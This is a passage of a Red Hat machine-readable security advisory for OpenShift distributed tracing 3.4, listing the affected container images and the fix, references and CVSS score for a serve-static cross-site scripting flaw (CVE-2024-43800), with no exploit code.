3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "send: Code Execution Vulnerability in Send Library" }, { "cve": "CVE-2024-43800", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-10T15:30:33.631718+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311154" } ], "notes": [ { "category": "description", "text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", "title": "Vulnerability description" }, { "category": "summary", "text": "serve-static: Improper Sanitization in serve-static", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-43800" }, { "category": "external", "summary": "RHBZ#2311154", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800", "url": "https://www.cve.org/CVERecord?id=CVE-2024-43800" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800" }, { "category": "external", "summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", "url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b" }, { "category": "external", "summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", "url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa" }, { "category": "external", "summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", "url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p" } ], "release_date": "2024-09-10T15:15:17.937000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red 